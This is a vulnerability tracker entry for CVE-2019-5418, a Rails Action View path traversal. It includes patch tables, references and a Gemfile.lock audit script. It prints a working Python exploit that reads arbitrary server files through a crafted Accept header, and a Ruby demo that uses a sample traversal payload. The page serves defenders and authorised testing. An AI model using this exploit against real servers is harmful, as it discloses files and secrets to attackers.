CVE-2019-5418
Description
Ruby on Rails contains a path traversal vulnerability in Action View. Specially crafted Accept headers, in combination with calls to `render file:`, can cause arbitrary files on the target server to be rendered, disclosing their contents. Per the Rails advisory (first reference below), only `render file:` calls that do not pin a format are affected; rendering ordinary templates is not.
CISA KEV
- Vendor: Rails
- Product: Ruby on Rails
- Due date: 2025-07-28
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Rails 5.2.1 - Arbitrary File Content Disclosure
```python
'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys

try:
    import requests
except ImportError:
    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
    sys.exit(1)


def banner():
    banner = """
    ----------------------------------------------
    Arbitrary Traversal exploit for Ruby on Rails
    CVE-2019-5418
    ----------------------------------------------
    """
    print(banner)


def check_args():
    if len(sys.argv) != 2:
        print("Invalid number of arguments entered!")
        how_to_use = "python3 Bandit.py url"
        print('Use as:', how_to_use)
        sys.exit(1)


def check_url(url):
    # The original compared the Response object itself to 200, which can
    # never be equal; test the status code, and treat connection errors the
    # same way.
    try:
        response = requests.get(url)
    except requests.RequestException:
        print("Url is invalid or can not be reached!")
        sys.exit(1)
    if response.status_code != 200:
        print("Url is invalid or can not be reached!")
        sys.exit(1)


def read_file(url, file):
    # The traversal payload is carried in the Accept header: vulnerable Action
    # View takes the value as the requested format and splices it into the
    # template lookup. The trailing '{{' closes the resolver's glob groups so
    # that the bare target path is what ends up being matched and rendered.
    headers = {'Accept': file + '{{'}
    req = requests.get(url, headers=headers)
    return req


def main():
    banner()
    check_args()
    url = sys.argv[1]
    check_url(url)
    while True:
        file = input("Enter file to read (enter quit to exit): ")
        if file.lower() == 'quit':
            break
        response = read_file(url, file)
        print(response.text)


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
```
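Why `Accept: <path>{{` in `read_file` above leaks a file, and why the workaround the Rails advisory gives (pinning `formats:` on `render file:`) stops it, is easiest to see in a small model. The Ruby below is an added example, not Action View's code and not the exploit author's: it borrows only the shape of the resolver's default lookup pattern (glob brace groups, each with an empty trailing alternative) and its expand-path-then-glob sequence. `REGISTERED_FORMATS`, `find_unsafe`, `find_safe` and the temp-directory fixture are assumptions made for the demonstration.

```ruby
require "tmpdir"
require "fileutils"

# Added model (not Action View code) of the CVE-2019-5418 lookup on Rails
# 5.2.1 and of the two checks that stop it. Only the pattern shape and the
# expand_path + Dir.glob sequence mirror the resolver; the rest is simplified.

# Assumption: the formats this toy application has registered as MIME types.
REGISTERED_FORMATS = %w[html json text].freeze

# Each placeholder is replaced by "{a,b,c}" built from the candidate list, so
# a request for format "html" with handlers raw/erb becomes
# "users/index{.{html},}{.{raw,erb},}".
PATTERN = ":action{.:formats,}{.:handlers,}".freeze

def build_query(view_root, action, formats, handlers)
  query = PATTERN.dup
  query.sub!(":action") { action }
  query.sub!(":formats") { "{#{formats.join(',')}}" }
  query.sub!(":handlers") { "{#{handlers.join(',')}}" }
  # expand_path collapses any ".." the format smuggled in, so the query may
  # now point outside view_root before the glob ever runs.
  File.expand_path(query, view_root)
end

# Unsafe lookup: whatever format the Accept header produced goes straight into
# the glob. The "{{" from the header closes the brace groups that follow it,
# and the all-empty alternative of the expansion is the bare target path.
def find_unsafe(view_root, action, formats, handlers)
  Dir.glob(build_query(view_root, action, formats, handlers)).uniq
end

# Hardened lookup: only registered formats are accepted (the fixed releases
# reject unregistered ones; the advisory workaround `formats: [:html]` pins
# them explicitly), and the expanded query must still sit under view_root.
def find_safe(view_root, action, formats, handlers)
  bad = formats.reject { |f| REGISTERED_FORMATS.include?(f) }
  raise ArgumentError, "unregistered format: #{bad.inspect}" unless bad.empty?
  query = build_query(view_root, action, formats, handlers)
  root = File.expand_path(view_root) + "/"
  raise ArgumentError, "lookup escaped view root" unless query.start_with?(root)
  Dir.glob(query).uniq
end

# Constructed fixture: app/views/users/index.html.erb, plus a secret file at
# the fixture root, i.e. outside the view directory.
def demo
  Dir.mktmpdir("cve-2019-5418") do |tmp|
    view_root = File.join(tmp, "app", "views")
    FileUtils.mkdir_p(File.join(view_root, "users"))
    File.write(File.join(view_root, "users", "index.html.erb"), "<h1>users</h1>")
    File.write(File.join(tmp, "secret.txt"), "db_password=hunter2")
    handlers = %w[raw erb]

    # What "Accept: ../../../../../secret.txt{{" arrives as. Five ".." are
    # needed here because the first one is glued to "index{.{" and does not
    # count as a path step; against "/etc/passwd" surplus ".." are harmless
    # because they are absorbed at "/".
    evil_format = "../../../../../secret.txt{{"

    blocked = begin
      find_safe(view_root, "users/index", [evil_format], handlers)
      nil
    rescue ArgumentError => e
      e.message
    end

    {
      normal:      find_unsafe(view_root, "users/index", ["html"], handlers).map { |p| File.basename(p) },
      leaked:      find_unsafe(view_root, "users/index", [evil_format], handlers).map { |p| File.read(p) },
      safe_normal: find_safe(view_root, "users/index", ["html"], handlers).map { |p| File.basename(p) },
      blocked:     blocked,
    }
  end
end

p demo if $PROGRAM_NAME == __FILE__
```

The two halves of the payload do different jobs: the `..` segments are resolved by `File.expand_path` before any glob, which is the actual traversal, and the `{{` only exists to keep the glob pattern well-formed once the target path has been reached, so that one of the brace alternatives is the target file with nothing appended. A format allowlist defeats the payload regardless of how the glob is built; the root check is a second, independent line of defence for any other way an attacker-influenced string might reach the resolver.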
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| not stated | Affected | not stated |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2:5.2.2.1+dfsg-1 |
| sid | Fixed | 2:5.2.2.1+dfsg-1 |
| forky | Fixed | 2:5.2.2.1+dfsg-1 |
| bullseye | Fixed | 2:5.2.2.1+dfsg-1 |
| bookworm | Fixed | 2:5.2.2.1+dfsg-1 |
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| RubyGems | actionview | ~> 4.2.11, < 4.2.11.1 | ~> 4.2.11, >= 4.2.11.1 |
| RubyGems | actionview | >=5.2.0,<5.2.2.1 | 5.2.2.1 |
| RubyGems | actionview | >=4.0.0,<4.2.11.1 | 4.2.11.1 |
| RubyGems | actionview | >=5.1.0,<5.1.6.2 | 5.1.6.2 |
| RubyGems | actionview | >=5.0.0,<5.0.7.2 | 5.0.7.2 |
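A practical way to use the ranges above is to read the pinned `actionview` out of a `Gemfile.lock` and compare it against the first fixed version of its release series. The Ruby below is an added example, not part of the page or of Rails: the fixed versions per series are those in the table, plus `6.0.0.beta3` from the exploit header; `FIXED_IN`, `audit_lockfile` and the sample lockfile fragment are constructed for the demonstration.

```ruby
require "rubygems"

# Added check (not from the page or from Rails): classify the actionview pin
# in a Gemfile.lock against the CVE-2019-5418 fixed versions. Series keys are
# "major.minor", except that every 4.x release was fixed by the same 4.2.11.1.
FIXED_IN = {
  "4"   => Gem::Version.new("4.2.11.1"),
  "5.0" => Gem::Version.new("5.0.7.2"),
  "5.1" => Gem::Version.new("5.1.6.2"),
  "5.2" => Gem::Version.new("5.2.2.1"),
  "6.0" => Gem::Version.new("6.0.0.beta3"),
}.freeze

# The resolved spec line in the GEM section is indented four spaces, e.g.
# "    actionview (5.2.1)". Dependency lines such as
# "      actionview (= 5.2.1)" are indented six and carry an operator, so the
# anchored regex skips them.
def actionview_version(lockfile_text)
  m = lockfile_text.match(/^ {4}actionview \(([0-9][^) ]*)\)$/)
  m && Gem::Version.new(m[1])
end

def fixed_version_for(version)
  major, minor = version.segments.first(2)
  FIXED_IN[major == 4 ? "4" : "#{major}.#{minor}"]
end

# :vulnerable  below the first fixed release of its series
# :fixed       at or above it (Gem::Version orders 6.0.0.beta3 < 6.0.0)
# :not_covered series with no fix listed, e.g. end-of-life 3.x (the exploit
#              header calls all versions affected) or series released later
def actionview_status(version)
  fixed = fixed_version_for(version)
  return :not_covered if fixed.nil?
  version < fixed ? :vulnerable : :fixed
end

def audit_lockfile(lockfile_text)
  version = actionview_version(lockfile_text)
  return [:no_actionview, nil] if version.nil?
  [actionview_status(version), version.to_s]
end

# Constructed Gemfile.lock fragment, not taken from a real project.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      actionpack (5.2.1)
        actionview (= 5.2.1)
        activesupport (= 5.2.1)
      actionview (5.2.1)
        activesupport (= 5.2.1)
LOCK

p audit_lockfile(SAMPLE_LOCK) if $PROGRAM_NAME == __FILE__
```

Run it as `ruby audit.rb` to see the classification of the embedded sample, or replace `SAMPLE_LOCK` with `File.read("Gemfile.lock")` for a real application. Note that the check is about the gem version only; an application on a vulnerable version that pins `formats:` on every `render file:` call has the advisory's workaround in place even though it still reports `:vulnerable` here.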
References
- https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q
- https://www.suse.com/security/cve/CVE-2019-5418.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-5418
- https://access.redhat.com/errata/RHSA-2019:0796
- https://access.redhat.com/errata/RHSA-2019:1147
- https://access.redhat.com/errata/RHSA-2019:1149
- https://access.redhat.com/errata/RHSA-2019:1289
- https://groups.google.com/forum/#!topic/rubyonrails-security/zRNVOUhKHrg
- https://lists.debian.org/debian-lts-announce/2019/03/msg00042.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y43636TH4D6T46IC6N2RQVJTRFJAAYGA
- https://web.archive.org/web/20190313201629/https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released
- https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-5418
- https://www.exploit-db.com/exploits/46585
- http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
- http://packetstormsecurity.com/files/152178/Rails-5.2.1-Arbitrary-File-Content-Disclosure.html
- http://www.openwall.com/lists/oss-security/2019/03/22/1
- https://security-tracker.debian.org/tracker/CVE-2019-5418